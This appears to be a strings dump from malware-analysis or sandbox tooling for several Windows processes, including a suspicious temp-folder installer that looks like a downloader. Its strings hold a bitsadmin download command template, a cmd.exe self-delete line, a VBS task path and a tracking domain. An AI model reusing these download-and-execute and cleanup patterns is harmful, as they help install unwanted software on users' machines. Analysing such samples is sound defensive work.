USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

ÃºW1

.ApX/

H.ZAf

Ã°[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_568:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

ÃºW1

.ApX/

H.ZAf

Ã°[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

SearchProtocolHost.exe_2268:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

MSSHooks.dll

IMM32.dll

SHLWAPI.dll

SrchCollatorCatalogInfo

SrchDSSLogin

SrchDSSPortManager

SrchPHHttp

SrchIndexerQuery

SrchIndexerProperties

SrchIndexerPlugin

SrchIndexerClient

SrchIndexerSchema

Msidle.dll

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

0xx=

%s(%d)

tid="0x%x"

pid="0x%x"

tagname="%s"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%s"

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

SHELL32.dll

PROPSYS.dll

ntdll.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

MsgWaitForMultipleObjects

SearchProtocolHost.pdb

2 2(20282|2

4%5S5

Software\Microsoft\Windows Search

https

kernel32.dll

msTracer.dll

msfte.dll

lX-X-X-XX-XXXXXX

SOFTWARE\Microsoft\Windows Search

tquery.dll

%s\%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

0xx%p%S%d

advapi32.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

winhttp.dll

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

%S(%d)

tagname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

Microsoft Windows Search Protocol Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchProtocolHost.exe

Windows

7.00.7601.17610

SearchFilterHost.exe_2952:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

IMM32.dll

MSSHooks.dll

mscoree.dll

SHLWAPI.dll

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

SearchFilterHost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Search.MSSFH"

3 3(30383|3

kernel32.dll

Software\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

tquery.dll

advapi32.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

0xx%p%S%d

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

0xx=

%S(%d)

tid="0x%x"

pid="0x%x"

tagname="%S"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

winhttp.dll

Microsoft Windows Search Filter Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchFilterHost.exe

Windows

7.00.7601.17610

Setup__2140_il2.exe_3512:

.text

`.rdata

@.data

.rsrc

@.reloc

j5SSh

8%uEP3

xSSSh

FTPjKS

FtPj;S

C.PjRV

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

WinHttpSetStatusCallback

fWIzyZ3CtqkwSGU6ncTUrL4WX1Iry5L3vqQTHEYD6bbBi5cnf1AG67zUnIwnb0UL86vGgIM5aFAV5qjUlos5fl0Ph5r6qKkUU3Auh5vnragKHGQ6w5/huucMU2Ury97mtr0dTz9A

Failed to get the Temp folder: %d

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::SetComponentInstallationEnded %S

%Y-%m-%d %H:%M:%S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::ProgressUpdate %S

Send progress update request %s

Progress Request for '%S' return %s

%c%c%c%c

C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb

VERSION.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

Secur32.dll

WinHttpCloseHandle

WinHttpOpen

WinHttpSetOption

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpOpenRequest

WinHttpSetStatusCallback

WinHttpSendRequest

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReceiveResponse

WINHTTP.dll

GetProcessHeap

GetCPInfo

zcÃ

.?AVAsyncWinHttp@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AUISupportErrorInfo@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

?456789:;

!"#$%&'()* ,-./0123

noesis.beryline.1 = s 'Inst Class'

CLSID = s '{ca90508a-de03-464c-b43f-2ab03068b458}'

noesis.beryline = s 'Inst Class'

CurVer = s 'noesis.beryline.1'

ForceRemove {ca90508a-de03-464c-b43f-2ab03068b458} = s 'Inst Class'

ProgID = s 'noesis.beryline.1'

VersionIndependentProgID = s 'noesis.beryline'

val ServerExecutable = s '%MODULE_RAW%'

TypeLib = s '{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}'

.sssh

REÃš

\.crr

s1f-'

.DC l

tweb

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

stdole2.tlbWWW(

msgWd

keyNameW

urlW

url2d

YtcmdLineW

P%CreateIconWW

iconUrlW

regKeyWW

CheckRegKeyW

keyWd

W.launchCommandLineWWW

~cmdW

WDIsShortNameInstalledd

Created by MIDL version 7.00.0555 at Sun Oct 16 03:45:47 2016

: :):0:`:

3!3@3^3{3

3"3&3*3.395

1%2S2v2

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

wKERNEL32.DLL

ADVAPI32.DLL

WUSER32.DLL

Winhttp.dll

shlwapi.dll

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

appimageurl

cmdl

capp=%s&cid=%s&mhx=%S&base=%s

\bitsadmin.exe

\Support Tools\bitsadmin.exe

:?*\"'/.

dream.capture

%sami%s%d%d.exe

%d-%.2d-%.2dT%.2d:%.2d:00

%d-%.2d-%.2dT%.2d:-:00

/retrynav %d

Advapi32.dll

shell32.dll

{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}

OLEAUT32.DLL

kernel32.dll

sn=%s&hx=%S&base=%s

rfsw%d

advapi32.dll

v2.0.50727

v1.1.4322

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

%ProgramFiles%\Microsoft Silverlight\sllauncher.exe

ami%sExd

bitsadmin /transfer amijob /download /priority high %s %s

ami%sExi

/c del "%s"

cmd.exe

%TEMP%\task.vbs

ami%sExdel

%%X

version.dll

OleAut32.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

1.1.5.26

setup.exe

selfdislikedfarfet.site